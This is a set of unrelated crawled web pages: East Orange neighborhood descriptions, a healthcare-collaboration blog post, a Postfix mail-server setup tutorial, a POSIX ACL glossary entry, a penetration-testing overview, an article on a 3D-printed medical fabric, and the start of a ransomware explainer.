- Ampere: a now-defunct train station anchors Ampere. It was developed directly on land that was owned by a company called Orange Waterworks. It came about after a plant owned by the Crocker Wheeler company was constructed. This company spurred development within the area. The station was named after André-Marie Ampère, a pioneer of electrodynamics. The station was reconstructed in 1907 as the Renaissance Revival Station. Its boundaries include Bloomfield (North), New York and Lawton Street (East), North Grove St. (West), and 4th Avenue (South).
- Teen Streets (Greenwood): the “teen” streets running through Greenwood Avenue are often grouped in with Ampere. The area was disturbed severely when Interstate 280 was constructed and when the Garden State Parkway came into existence. The old DL&W Railroad’s Grove Street station was situated at Main and Grove streets. The area is bounded on the North by Fourth Avenue, on the East by North 15th St., on the West by North Grove St., and on the South by New Jersey Transit’s Morris & Essex Lines and Eaton Place. 
- Presidential Estates: this is a recent designation – streets within the area are named after the original United States presidents. Many large, well-maintained homes are situated on the streets, which are lined with big, old shade trees throughout the neighborhood, a characteristic of the city’s northern section. It is bounded roughly by Bloomfield toward the North, North Grove St. and the Montclair-Boonton Line toward the East, Garden State Parkway toward the West, and Springdale Avenue toward the South.
- Elmwood: situated in the city’s southeastern area, Elmwood Park has seven different tennis courts along Rhode Island Ave., one swimming pool containing a pool house, one baseball field, one softball field, one walking track, a restored fieldhouse on Oak Street, and a basketball court situated on Oak Street/Elmwood Avenue. The area houses one of the last Carnegie Libraries, which opened up in 1912 (the Elmwood branch of East Orange Public Library).
- Franklin (Doddtown): John Dodd surveyed and founded the Watsessing Plain area. Upsala College’s former campus is situated here. It eventually was reconstructed into the East Orange Campus High School on Prospect Street’s East side, which contains an adjacent subdivision for new housing. It is bounded roughly by Bloomfield toward the North, Park Avenue toward the South, Orange toward the West, and Garden State Parkway toward the East.
HotHeadTech.com is the best NJ Computer Support service out there.
<urn:uuid:17cb62e4-0cd8-4da1-b2a3-2900897a886c>
CC-MAIN-2024-38
https://www.hotheadtech.com/east-orange-nj/
2024-09-17T11:25:36Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651773.64/warc/CC-MAIN-20240917104423-20240917134423-00096.warc.gz
en
0.976316
1,139
3.296875
3
How the New Normal ushers in global healthcare collaboration
Many questions remain unanswered about the post-pandemic New Normal scenario. Numbers are thrown about and theories abound. The pandemic has caused cataclysmic changes in our world and a tumultuous upheaval across industries. Global healthcare, of course, has been the focus over the last couple of years. While significant advances were expected in healthcare, no one could have predicted the rapid transformation of the industry. Globally, the response of the healthcare industry has been rapid and collaborative. Quick changes to policies and procedures, faster adoption of medicines and treatments, with timelines moving from years to weeks and even days, quick turnarounds in research and development, sidestepping administrative red tape and bringing innovative solutions to market quickly - all of these have been brought about to meet a common agenda, which is to help communities and save lives. Undoubtedly, the healthcare industry has demonstrated resilience and agility, focusing on simple solutions to complex problems, with an extraordinary pace of innovation. The pandemic has accelerated development in both medicine and technology, and triggered reinvention across many sectors in healthcare.
Why is collaboration important?
The world has encountered pandemics and widespread infectious diseases before, which have demonstrated that nations only stand to benefit from collaborative efforts to stop the spread of disease. COVID-19 has shown how interdependent the world is. Nation-wide lockdowns and closing of borders have had a far-reaching impact on the physical, mental, and economic well-being of populations. International collaboration in healthcare becomes of paramount importance. 
This is because:
- Nations are closely connected, resulting in the rapid spread of diseases, bringing the realisation that every disease needs to be eradicated across the globe and not just in one country. This is evidenced by the fact that the SARS-CoV-2 virus continues to mutate, and its variants are still spreading across the globe.
- Organisations across the world now know that sharing of both knowledge and experience is beneficial to achieve faster learning and progress. A common pool of resources helps in prevention and treatment. Such sharing especially helps countries that lack surveillance infrastructure.
- Creating world-wide standards helps put in place a framework for comparing information and best practices, as well as building mutual understanding and trust.
In the healthcare industry, companies have realised that it is not possible to do it all alone. Global partnerships to facilitate both medicine and vaccine development and distribution are on the rise, while simultaneously providing solutions for faster and more efficient patient care, as well as equipment and guidance for healthcare workers.
Digital transformation accelerates healthcare
International cooperation and collaboration assume supreme importance when dealing with any disease. While the pandemic resulted in millions of deaths, it is firmly believed that vaccinations have reduced the severity of the disease and mortality too. Global vaccinations have crossed 10.3 billion across 184 countries. A slew of worldwide initiatives started at the beginning of the pandemic, many of which have helped countries handle grave healthcare emergencies. The World Health Organisation (WHO) launched global funding efforts, standardised vaccine approvals and launched the Access to COVID-19 Tools (ACT) Accelerator, which is a global collaboration to fast-track development of diagnostic tests, treatment, and vaccines. 
The global research community has collaborated across disciplines - academic, industry, research, and professional groups. There has been exchange of data and information on laboratory results and surveillance, genome sequencing, and clinical outcomes. Technology has played a major role in pandemic response, management and knowledge sharing. Healthcare has undergone a robust digital revolution during COVID-19. Information and data exchange platforms are vital to control the spread of any epidemic disease. Public-Private Partnerships (PPP) and telemedicine have emerged as game-changers. Cloud-based systems facilitate easy sharing of data and information across the globe. AI and ML help mine big data to understand trends and predict future outbreaks. Some of the areas where technology has proven to be indispensable include:
- Bioinformatics systems for drug discovery and genome sequencing
- Decision Support Systems for triaging, risk assessment and managing healthcare supply chains
- Robotics to aid health workers
- Online interactive dashboards
- IoT for real-time monitoring and tracking by use of sensors and surveillance systems.
Data intelligence and data analytics platforms are going to be imperative for future pandemics, with regard to predictions and response, as well as management. While the global healthcare industry underwent an abrupt digital transformation due to COVID-19, the future is here, now. Digital platforms built on robust technology are going to be essential to the healthcare industry to provide agile, flexible, sentient, collaborative, and predictive solutions in a dynamically changing environment.* The pandemic has brought about the awareness that global collaboration across multiple disciplines is required for a safer world.
* For organizations on the digital transformation journey, agility is key in responding to a rapidly changing technology and business landscape. 
Now more than ever, it is crucial to deliver on and exceed organizational expectations with a robust digital mindset backed by innovation. Enabling businesses to sense, learn, respond, and evolve like a living organism will be imperative for business excellence going forward. A comprehensive, yet modular suite of services is doing exactly that. Equipping organisations with intuitive decision-making automatically at scale, actionable insights based on real-time solutions, anytime/anywhere experience, and in-depth data visibility across functions leading to hyper-productivity, Live Enterprise is building connected organizations that are innovating collaboratively for the future.
<urn:uuid:13be9568-94f0-452e-a5aa-8e8cf8da2d2d>
CC-MAIN-2024-38
https://www.infosysbpm.com/blogs/master-data-management/how-the-new-normal-ushers-in-global-healthcare-collaboration.html
2024-09-17T13:21:21Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651773.64/warc/CC-MAIN-20240917104423-20240917134423-00096.warc.gz
en
0.946547
1,130
2.609375
3
How to install and configure Postfix on Ubuntu 16.04
Postfix is a popular open-source Mail Transfer Agent (MTA) that can be used to route and deliver email on a Linux system. It is estimated that around 25% of public mail servers on the internet run Postfix. In this guide, we'll teach you how to get up and running quickly with Postfix on an Ubuntu 16.04 server. In order to properly configure Postfix, you will need a Fully Qualified Domain Name pointed at your Ubuntu 16.04 server. If you plan on accepting mail, you will need to make sure you have an MX record pointing to your mail server as well. For the purposes of this tutorial, we will assume that you are configuring a host that has the FQDN of mail.example.com.
Step 1: Install Postfix
Postfix is included in Ubuntu's default repositories, so installation is incredibly simple. To begin, update your local apt package cache and then install the software. We will be passing the DEBIAN_PRIORITY=low environmental variable into our installation command in order to answer some additional prompts:
sudo apt-get update
sudo DEBIAN_PRIORITY=low apt-get install postfix
Use the following information to fill in your prompts correctly for your environment:
- General type of mail configuration?: For this, we will choose Internet Site since this matches our infrastructure needs.
- System mail name: This is the base domain used to construct a valid email address when only the account portion of the address is given. For instance, the hostname of our server is mail.example.com, but we probably want to set the system mail name to example.com so that, given the username user1, Postfix will use the address user1@example.com.
- Root and postmaster mail recipient: This is the Linux account that will be forwarded mail addressed to root@ and postmaster@. Use your primary account for this. In our case, sammy.
- Other destinations to accept mail for: This defines the mail destinations that this Postfix instance will accept. 
If you need to add any other domains that this server will be responsible for receiving, add those here; otherwise, the default should work fine.
- Force synchronous updates on mail queue?: Since you are likely using a journaled filesystem, accept No.
- Local networks: This is a list of the networks that your mail server is configured to relay messages for. The default should work for most scenarios. If you choose to modify it, make sure to be very restrictive in regards to the network range.
- Mailbox size limit: This can be used to limit the size of messages. Setting it to "0" disables any size restriction.
- Local address extension character: This is the character that can be used to separate the regular portion of the address from an extension (used to create dynamic aliases).
- Internet protocols to use: Choose whether to restrict the IP version that Postfix supports. We'll pick "all" for our purposes.
To be explicit, these are the settings we'll use for this guide:
- General type of mail configuration?: Internet Site
- System mail name: example.com (not mail.example.com)
- Root and postmaster mail recipient: sammy
- Other destinations to accept mail for: $myhostname, example.com, mail.example.com, localhost.example.com, localhost
- Force synchronous updates on mail queue?: No
- Local networks: 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
- Mailbox size limit: 0
- Local address extension character: +
- Internet protocols to use: all
If you ever need to return to re-adjust these settings, you can do so by typing:
sudo dpkg-reconfigure postfix
The prompts will be pre-populated with your previous responses. When you are finished, we can now do a bit more configuration to set up our system how we'd like it.
Step 2: Tweak the Postfix Configuration
Next, we can adjust some settings that the package did not prompt us for. To begin, we can set the mailbox format. 
We will use the Maildir format, which separates messages into individual files that are then moved between directories based on user action. The other option is the mbox format (which we won't cover here), which stores all messages within a single file. We will set the home_mailbox variable to Maildir/, which will create a directory structure under that name within the user's home directory. The postconf command can be used to query or set configuration settings. Configure home_mailbox by typing:
sudo postconf -e 'home_mailbox= Maildir/'
Next, we can set the location of the virtual_alias_maps table. This table maps arbitrary email accounts to Linux system accounts. We will create this table at /etc/postfix/virtual. Again, we can use the postconf command:
sudo postconf -e 'virtual_alias_maps= hash:/etc/postfix/virtual'
Step 3: Map Mail Addresses to Linux Accounts
Next, we can set up the virtual maps file. Open the file in your text editor:
sudo nano /etc/postfix/virtual
The virtual alias map table uses a very simple format. On the left, you can list any addresses that you wish to accept email for. Afterwards, separated by whitespace, enter the Linux user you'd like that mail delivered to. For example, if you would like to accept email at email@example.com and firstname.lastname@example.org and would like to have those emails delivered to the sammy Linux user, you could set up your file like this:
email@example.com sammy
firstname.lastname@example.org sammy
After you've mapped all of the addresses to the appropriate server accounts, save and close the file. We can apply the mapping by typing:
sudo postmap /etc/postfix/virtual
Restart the Postfix process to be sure that all of our changes have been applied:
sudo systemctl restart postfix
Step 4: Adjust the Firewall
If you are running the UFW firewall, as configured in the initial server setup guide, we'll have to allow an exception for Postfix. You can allow connections to the service by typing:
sudo ufw allow Postfix
The Postfix server component is installed and ready. 
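Before applying the table with postmap, it can be worth sanity-checking that every entry really has the two-column shape described above. The following sketch validates a throwaway sample table built from this guide's placeholder addresses; on a real server you would point it at /etc/postfix/virtual instead:

```shell
#!/bin/sh
# Sketch: verify each non-comment line of a Postfix virtual alias table
# has exactly two fields (address and destination Linux user).
TABLE=$(mktemp)
cat > "$TABLE" <<'EOF'
email@example.com sammy
firstname.lastname@example.org sammy
EOF
if awk 'NF && $1 !~ /^#/ && NF != 2 { print "bad line " NR ": " $0; bad = 1 } END { exit bad }' "$TABLE"; then
    echo "virtual table OK"
fi
rm -f "$TABLE"
```

A check like this catches stray entries before postmap bakes them into the hash database.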
Next, we will set up a client that can handle the mail that Postfix will process.
Step 5: Setting up the Environment to Match the Mail Location
Before we install a client, we should make sure our MAIL environmental variable is set correctly. The client will inspect this variable to figure out where to look for users' mail. In order for the variable to be set regardless of how you access your account (through ssh, su, su -, sudo, etc.), we need to set the variable in a few different locations. We'll add it to /etc/bash.bashrc and a file within /etc/profile.d to make sure each user has this configured. To add the variable to these files, type:
echo 'export MAIL=~/Maildir' | sudo tee -a /etc/bash.bashrc | sudo tee -a /etc/profile.d/mail.sh
To read the variable into your current session, you can source the /etc/profile.d/mail.sh file:
source /etc/profile.d/mail.sh
Step 6: Install and Configure the Mail Client
In order to interact with the mail being delivered, we will install the s-nail package. This is a variant of the BSD xmail client, which is feature-rich, can handle the Maildir format correctly, and is mostly backwards compatible. The GNU version of mail has some frustrating limitations, such as always saving read mail to the mbox format regardless of the source format. To install the s-nail package, type:
sudo apt-get install s-nail
We should adjust a few settings. Open the /etc/s-nail.rc file in your editor:
sudo nano /etc/s-nail.rc
Towards the bottom of the file, add the following options:
. . .
set emptystart
set folder=Maildir
set record=+sent
This will allow the client to open even with an empty inbox. It will also set the Maildir directory to the internal folder variable and then use this to create a sent mbox file within that, for storing sent mail. Save and close the file when you are finished.
Step 7: Initialize the Maildir and Test the Client
Now, we can test the client out.
Initializing the Directory Structure
The easiest way to create the Maildir structure within our home directory is to send ourselves an email. 
We can do this with the mail command. Because the sent file will only be available once the Maildir is created, we should disable writing to that for our initial email. We can do this by passing the -Snorecord option. Send the email by piping a string to the mail command. Adjust the command to mark your Linux user as the recipient:
echo 'init' | mail -s 'init' -Snorecord sammy
You should get the following response:
Can't canonicalize "/home/sammy/Maildir"
This is normal and will only show during this first message. We can check to make sure the directory was created by looking for our ~/Maildir directory:
ls -R ~/Maildir
You should see the directory structure has been created and that a new message file is in the ~/Maildir/new directory:
cur new tmp
It looks like our mail has been delivered.
Managing Mail with the Client
Use the client to check your mail:
mail
You should see your new message waiting:
s-nail version v14.8.6. Type ? for help.
"/home/sammy/Maildir": 1 message 1 new
>N 1 email@example.com Wed Dec 31 19:00 14/369 init
Just hitting ENTER should display your message:
[-- Message 1 -- 14 lines, 369 bytes --]:
From firstname.lastname@example.org Wed Dec 31 19:00:00 1969
Date: Fri, 13 May 2016 18:07:49 -0400
You can get back to your message list by typing h:
s-nail version v14.8.6. Type ? for help.
"/home/sammy/Maildir": 1 message 1 new
>R 1 email@example.com Wed Dec 31 19:00 14/369 init
Since this message isn't very useful, we can delete it with d. Quit to get back to the terminal by typing q.
Sending Mail with the Client
You can test sending mail by typing a message in a text editor:
nano ~/test_message
Inside, enter some text you'd like to email:
This is a test. Please confirm receipt!
Using the cat command, we can pipe the message to the mail process. This will send the message as your Linux user by default. 
You can adjust the "From" field with the -r flag if you want to modify that value to something else:

cat ~/test_message | mail -s 'Test email subject line' -r from_field_account firstname.lastname@example.org

The options above are:

- -s: The subject line of the email
- -r: An optional change to the "From:" field of the email. By default, the Linux user you are logged in as will be used to populate this field. The -r option allows you to override this.
- email@example.com: The account to send the email to. Change this to be a valid account you have access to.

You can view your sent messages within your mail client. Start the interactive client again by typing:

Afterwards, view your sent messages by typing:

You can manage sent mail using the same commands you use for incoming mail.

You should now have Postfix configured on your Ubuntu 16.04 server. Managing email servers can be a tough task for beginning administrators, but with this configuration, you should have basic MTA email functionality to get you started.
<urn:uuid:ae48f9b4-8306-404c-9f9a-e3bb03ef001e>
CC-MAIN-2024-38
https://support.hostway.com/hc/en-us/articles/360000310410-How-to-install-and-configure-Postfix-on-Ubuntu-16-04
2024-09-18T14:56:19Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651899.75/warc/CC-MAIN-20240918133146-20240918163146-00896.warc.gz
en
0.841819
2,611
2.65625
3
Data Management Glossary

POSIX ACLs are fine-grained access rights for files and directories. An access control list (ACL) consists of entries specifying access permissions on an associated object. POSIX ACLs provide more granular control over file and directory permissions than the traditional POSIX permission model.

The traditional POSIX permission model uses a set of file bits to define permissions for the owner, group, and other users. In contrast, POSIX ACLs provide a more flexible and fine-grained access control mechanism by allowing multiple entries in an access control list, each of which specifies a different user or group and a different set of permissions.

With POSIX ACLs, you can grant or deny specific permissions to individual users or groups for a particular file or directory. For example, you can allow a particular user to read and write a file, but deny them the ability to execute it. You can also grant a group of users read-only access to a directory, but prevent them from modifying or deleting any files in that directory.

POSIX ACLs are supported on many Unix-based operating systems, including Linux, BSD, and macOS. They can be managed using command-line utilities such as setfacl and getfacl. Note that not all filesystems support POSIX ACLs, and their behavior may vary across different implementations.
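The "multiple entries, each specifying a different user or group" model can be sketched in Python. The following is a simplified, illustrative model of how such entries might be evaluated (loosely following the POSIX.1e draft order: owner first, then named users, then group entries limited by a mask entry, then everyone else); the tag names and users here are made up for the example, and this does not touch a real filesystem:

```python
from dataclasses import dataclass

READ, WRITE, EXECUTE = 4, 2, 1  # rwx bits, as in the classic mode bits

@dataclass(frozen=True)
class AclEntry:
    tag: str        # "owner", "named_user", "owning_group", "named_group", "mask", "other"
    qualifier: str  # user or group name this entry applies to ("" for mask/other)
    perms: int      # bitwise OR of READ, WRITE, EXECUTE

def check_access(acl, user, groups, requested):
    """Decide whether `user` (a member of `groups`) gets `requested` perms."""
    def entries(tag):
        return [e for e in acl if e.tag == tag]

    masks = entries("mask")
    mask = masks[0].perms if masks else READ | WRITE | EXECUTE

    owner = entries("owner")[0]
    if user == owner.qualifier:          # the owner entry is not limited by the mask
        return requested & owner.perms == requested

    for e in entries("named_user"):      # named-user entries are limited by the mask
        if e.qualifier == user:
            return requested & e.perms & mask == requested

    group_hits = [e for e in entries("owning_group") + entries("named_group")
                  if e.qualifier in groups]
    if group_hits:                       # any matching group entry may grant access
        return any(requested & e.perms & mask == requested for e in group_hits)

    return requested & entries("other")[0].perms == requested

acl = [
    AclEntry("owner", "alice", READ | WRITE),
    AclEntry("named_user", "bob", READ | WRITE),
    AclEntry("owning_group", "staff", READ),
    AclEntry("mask", "", READ),          # caps named users and all groups at read-only
    AclEntry("other", "", 0),
]
```

The mask entry in this sketch shows why getfacl output sometimes reports a reduced "effective" permission: bob's entry grants read and write, but the mask limits him to read-only, while the owner is unaffected.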
<urn:uuid:be1b449d-3e33-49c3-8bfd-9831c09c7080>
CC-MAIN-2024-38
https://www.komprise.com/glossary_terms/posix-acls/
2024-09-19T20:22:40Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652067.20/warc/CC-MAIN-20240919194038-20240919224038-00796.warc.gz
en
0.889193
275
3.171875
3
Pen testing is a security exercise in which a cyber-security specialist seeks to discover and exploit flaws in a computer system. This simulated attack aims to find any weak points in a system's security that attackers may exploit.

This is analogous to a bank paying someone to disguise themselves as a burglar to try to get into their building and access the vault. If the 'burglar' succeeds in breaking into the bank or the vault, the bank gains vital information about how to strengthen its security systems.

Ethical hacking techniques, which imitate a cyberattack, assist security experts in evaluating the effectiveness of information security safeguards within their businesses. The pen test seeks to breach an organization's cyber defenses by looking for exploitable flaws in networks, online apps, and user security. The goal is to identify system flaws before attackers do. In the case of networks, the overarching purpose is to improve security by closing unused ports, debugging services, adjusting firewall rules, and closing any security gaps.

Appknox's pen testing tool is used to find, evaluate, and report on common online application vulnerabilities such as buffer overflow, SQL injection, and cross-site scripting, to mention a few. Pen testing can also acquire privileged access to sensitive systems or steal data from a secure system. In the context of web application security, penetration testing is frequently used to supplement a web application firewall (WAF).

Common Pen Testing Methods

Here are some regularly used penetration testing methodologies, organized by how the test is structured.

External testing: Entails assaults on the company's network perimeter utilizing processes outside the organization's systems, such as the extranet and Internet.

Internal testing: Performed from within the organization's environment, this test seeks to determine what would happen if the network perimeter is successfully breached, or what an authorized user might do to access certain information resources within the organization.
Blind testing: The testing team has little or no knowledge of the business. It must rely on publicly accessible information (such as the corporate website, domain name registration, and so on) to acquire information about the target and execute penetration tests. In blind testing, the tester attempts to mimic the activities of a real hacker.

Double-blind testing: Only a few people inside the organization are made aware of the testing during this exercise. Because the IT and security personnel are not told or informed in advance, they are "blind" to the intended testing operations. This helps organizations assess their security monitoring and incident detection processes, as well as their escalation and response protocols.

Targeted testing: Sometimes known as the lights-on technique, targeted testing involves both the IT and penetration testing teams. Testing efforts and information about the goal and network design are known in advance. Targeted tests take less time and effort than blind tests, but they don't always give as thorough a picture of an organization's security vulnerabilities and response capabilities as other testing methodologies.

Common Tools for Network Penetration Testing

Pen testing provides IT teams with a new viewpoint on how to strengthen defenses, and it adds an effective set of tools and services to the armory of security professionals. These include:

- Port scanners
- Vulnerability scanners
- Application scanners
- Proxies for evaluating web applications

1. The Network Mapper (NMAP): NMAP is a tool that identifies flaws in an enterprise's network infrastructure. It may also be used to perform audits. NMAP takes newly formed raw data packets and utilizes them to determine:

- Which hosts are accessible on a given network trunk or segment
- The versions and types of data packet filters/firewalls used by any given host

Organizations may use NMAP to construct a virtual map of a network segment and then determine the primary points of weakness that a cyber attacker might exploit.
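At its core, the host and port discovery a scanner like NMAP performs comes down to probing whether anything answers on a given address and port. A minimal Python sketch of that idea is below; it is a plain TCP connect probe, far simpler than NMAP's raw-packet techniques, and should only ever be pointed at hosts you are authorized to test:

```python
import socket

def tcp_port_open(host, port, timeout=1.0):
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def scan(host, ports):
    """Map each port to whether something is listening on it."""
    return {port: tcp_port_open(host, port) for port in ports}
```

For example, `scan("127.0.0.1", [22, 80, 443])` returns a dict telling you which of those ports accept connections on the local machine.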
NMAP may be used at any stage of the pen testing process and is a free, open-source program found at www.nmap.org.

2. Metasploit: Rather than a single tool, Metasploit offers a collection of pen-testing tools. It is a framework that is constantly improving to keep up with today's ethical hackers, who may also contribute to the platform. Originally built on Perl and later rewritten in Ruby, Metasploit comes with a plethora of built-in exploits that can be used to carry out various types of pen tests, and many are even customizable. For example, it already has a built-in network sniffer and multiple access points for mounting and coordinating various types of cyber-based assaults.

3. Wireshark: Wireshark is a network protocol and data packet analyzer that can detect network problems and assess traffic for vulnerabilities in real time. It highlights data packet features, origin, destination, and more by evaluating connection-level information and the elements of data packets. While it detects possible vulnerabilities, a separate penetration testing tool is still required to attack them.

W3AF (Web Application Attack and Audit Framework) is a pen-testing suite whose primary goal is to identify and exploit any security flaws in web-based applications, and it includes a plethora of tools for doing so.

4. John the Ripper: JTR is a quick and efficient password cracker that is available for various operating systems (Unix, macOS, Windows, DOS, BeOS, and OpenVMS). Pen testers may use it to discover weak passwords and fix the underlying flaws in regular password use. JTR was designed and developed on an open-source platform, and it is available at http://www.openwall.com/john/.

What Is the Main Goal of Penetration Testing?

In recent years, penetration testing has become a frequently used security technique by enterprises. This is especially true for companies that retain and access sensitive or private information, such as banks or healthcare providers.
While the immediate goal of a pen test is to uncover vulnerabilities or exploit flaws, it is crucial to remember that the purpose of a pen test is frequently linked to a business objective within an overall strategy. For example, as part of the Cybersecurity Maturity Model Certification (CMMC), Department of Defense contractors must have proper protocols in place to secure Controlled Unclassified Information (CUI). A penetration test is one of several security measures required to meet auditor criteria, depending on the level attained by the contractor.

On the other hand, the security objectives of a software firm might differ substantially. Application penetration testing, for example, aids in identifying vulnerabilities and weaknesses in code that may be vulnerable to an attack. Following that, developers strive to provide patches to update the codebase. Finally, the sorts of penetration testing done are determined by the business goals, which we shall discuss momentarily.

Reporting on Results

After the testing phase is completed, a report is generated and submitted to corporate leadership and business owners. This report is the true worth of any penetration testing project: it should give direction and recommendations for lowering risk exposure and practical measures toward resolution.

It is vital to note that penetration testing reports are customized to satisfy a company's cyber security needs based on criteria such as:

- How their network is configured
- Business goals for conducting a pen test
- What is being tested: software, servers, endpoints, physical controllers, and so on
- The monetary worth of the tangible or intangible assets being safeguarded

And a lot more!

What Are The Various Methods Of Penetration Testing?

Based on the information supplied and the sort of flaw to be discovered, testers choose one of three approaches to penetration testing:

1. The white box

The testers in a white box test have comprehensive knowledge of the system and full access to it.
This technique aims to thoroughly test the system and collect as much information as feasible. The advantage in this situation is that because the tester has unrestricted access to and knowledge of the system, including code quality and internal designs, the pen test may uncover even remotely situated vulnerabilities, providing a full picture of the security posture.

2. The black box

As you might expect, the tester in this technique has no knowledge of the system and approaches the test as an uninformed attacker would. This method is the most realistic and requires a high level of technical expertise. It also takes the most time and costs more than the white-box method.

3. The grey box

As the name implies, this method falls between white box and black box testing. The tester knows very little about the system. The advantage of this strategy is that, even with limited knowledge, the tester has a more targeted area of attack and avoids a trial-and-error manner of assault.
<urn:uuid:4452e8b0-5b71-47fa-abd3-50caa5ab34cd>
CC-MAIN-2024-38
https://www.appknox.com/cyber-security-jargons/penetration-testing
2024-09-21T03:01:14Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701427996.97/warc/CC-MAIN-20240921015054-20240921045054-00696.warc.gz
en
0.942258
2,017
3.078125
3
Nanyang Technological University (NTU) in Singapore has introduced a revolutionary 3D-printed fabric, aptly named “RoboFabric,” designed to transform medical support devices. This cutting-edge material combines flexibility and rigidity, promising significant enhancements in comfort and functionality for various medical applications. This exciting development underscores the potential of 3D printing technology in revolutionizing traditional medical supports. Introduction to RoboFabric The Inspiration and Design RoboFabric draws its innovative design from the natural world. Researchers at NTU took inspiration from the structural complexity of pangolins and octopuses, leading to the creation of a fabric consisting of interlocking tiles produced through precise 3D printing. Each tile is connected by metal fibers, which can contract to vastly increase the rigidity of the structure, enhancing its support capabilities. The result is a highly adaptable material that effectively combines the benefits of flexibility and firmness. The use of a mathematical algorithm in the design process ensures each segment of RoboFabric is customized to the specific needs of the user. This precision in production not only offers a bespoke fit but also maximizes the functional benefits of the material. The interlocking tiles enable the fabric to be both flexible and firm as needed, pushing the boundaries of what traditional medical fabrics can achieve. This unique design approach allows RoboFabric to serve a variety of medical applications, offering specific customization options that were previously unachievable with conventional materials. Flexibility and Rigidity on Demand One of the most striking features of RoboFabric is its ability to change its rigidity on demand. When metal fibers within the fabric contract, the overall structure can increase in rigidity by up to 350 times. 
This adaptability ensures that patients receive the exact type of support required at any given moment, making it ideal for a variety of medical conditions and needs. Such flexibility is crucial for patients who require different levels of support throughout their treatment or daily activities, providing a more responsive and effective solution compared to traditional supports. The flexibility of RoboFabric also facilitates ease of application and comfort for the wearer. Traditional rigid supports often cause discomfort and restrict movement, but RoboFabric offers a more user-friendly alternative. Being able to adjust the firmness as needed means patients can enjoy a greater degree of mobility while still benefiting from necessary support. This feature is especially beneficial in rehabilitation settings, where the requirements for support can change as a patient progresses through their recovery. Practical Applications in Medicine Reducing Muscular Effort A significant advantage of RoboFabric is its potential to reduce muscular effort for the wearer. According to NTU researchers, this innovative fabric can decrease muscular exertion by about 40%, making it particularly beneficial for the elderly and patients with compromised motor functions. This reduction in effort can lead to improved quality of life and faster recovery times. By minimizing the strain on muscles, RoboFabric can help prevent secondary injuries and facilitate a smoother, more comfortable recovery process. The ability to support and stabilize without overly straining the muscles represents a leap forward in patient care. For individuals with chronic conditions or those recovering from surgery, minimizing muscular effort is crucial in preventing further injury and promoting healing. Additionally, RoboFabric’s adaptable support can be particularly advantageous for patients with neurological conditions, where varying levels of muscle weakness and spasticity demand a more flexible support system. 
Prototypes in Limb Support Several prototypes have already been developed using RoboFabric, showcasing its versatility and effectiveness. An elbow brace designed with the fabric has demonstrated an enhanced load-bearing capacity, providing more robust support than traditional braces. Additionally, a wrist support prototype has been specifically crafted to help stabilize the joints of patients with Parkinson’s disease, offering critical support for managing tremors. These prototypes exemplify how RoboFabric can be tailored to address various medical needs. Each application highlights the material’s ability to enhance support, improve comfort, and adapt to specific user requirements. The practical implications for healthcare are vast, potentially aiding in the treatment and management of numerous conditions. These early prototypes provide a glimpse into the future possibilities of RoboFabric, suggesting that it could be adapted for other forms of medical support, including orthopedic aids and rehabilitation devices. The Future of Medical Support Devices The Shift Towards Personalization There is a growing trend towards personalized medical devices, and RoboFabric aligns perfectly with this trajectory. Traditional rigid casts are becoming obsolete as patients demand more customized and adaptable solutions. RoboFabric’s ability to be tailored to individual needs and its adaptive rigidity positions it at the forefront of this shift. This personalization trend reflects a broader movement within medical technology, where the focus is increasingly on creating bespoke solutions that address the unique needs of each patient. Assistant Professor Wang Yifan from NTU emphasized that the future of limb supports lies in personalization and adaptability. RoboFabric’s design not only responds to these demands but exceeds expectations, providing a flexible, user-friendly, and effective alternative to conventional supports. 
As healthcare continues to evolve towards more patient-centered models, technologies like RoboFabric are poised to play a significant role in delivering tailored care solutions that improve patient outcomes and satisfaction. Expert Insights and Clinical Implications Nanyang Technological University (NTU) in Singapore has unveiled an innovative breakthrough in the realm of medical support devices with its introduction of a revolutionary 3D-printed fabric known as “RoboFabric.” This pioneering material is engineered to integrate both flexibility and rigidity, aiming to significantly improve the comfort and functionality of various medical applications. Traditional medical supports often suffer from a lack of adaptability, leading to discomfort or limited movement for patients. However, RoboFabric addresses these limitations by offering a customizable, responsive fabric that molds to the user’s needs. This advanced 3D-printed fabric represents a substantial leap forward, highlighting the transformative potential of 3D printing technology in the healthcare sector. By replacing conventional materials with RoboFabric, medical devices can be tailored more precisely to individual requirements, thereby enhancing patient experience and outcomes. Whether used in braces, casts, or prosthetics, this material could revolutionize the way medical supports are designed and utilized. The development of RoboFabric underscores NTU’s commitment to pushing the boundaries of technology and improving patient care through innovative solutions.
<urn:uuid:5d388a89-e592-4d86-914e-8953e26622a2>
CC-MAIN-2024-38
https://manufacturingcurated.com/electronics-and-equipment/ntu-researchers-innovate-adaptive-3d-printed-medical-support-fabric/
2024-09-10T04:43:09Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651196.36/warc/CC-MAIN-20240910025651-20240910055651-00796.warc.gz
en
0.937161
1,306
2.703125
3
Ransomware is one of the most damaging types of malware, causing billion-dollar disasters every year. For businesses and individuals alike, a ransomware infection can mean losing irreplaceable files and spending weeks recovering computers. In this article, we'll explore the definition of ransomware, how it works, and how to get it off of your computer.

Like adware and spyware, ransomware is a type of malware. Unlike some other kinds of malware, ransomware has a very specific definition: it's malicious software that encrypts the victim's files and demands a ransom to decrypt them. Generally, the ransomware author requests the ransom in Bitcoin or another hard-to-trace cryptocurrency. While most types of ransomware only encrypt a user's files, some threaten to publish them as well. Because of this, ransomware can be hugely damaging to an organization, both in terms of finances and reputation.

New ransomware variants are constantly being developed, and attacks surged during the COVID-19 pandemic, which exposed vulnerabilities in remote-access setups as many workers switched to working from home.

How ransomware works

In a nutshell, ransomware abuses encryption, a technology for scrambling data, to prevent victims from accessing their data unless they pay up. After a victim unwittingly installs it, the ransomware follows a few general steps:

- In the background, the ransomware program encrypts (or scrambles) the user's files one by one, deleting the originals.
- The ransomware displays the ransom message, either by changing the desktop background or by opening a custom application in full screen.
- In the ransom note, the user is given an ultimatum: either they pay up and have their files restored, or the attacker throws away the encryption key and the files are lost forever.
- On the same page as the ransom note, the program displays a Bitcoin (or other cryptocurrency) address.
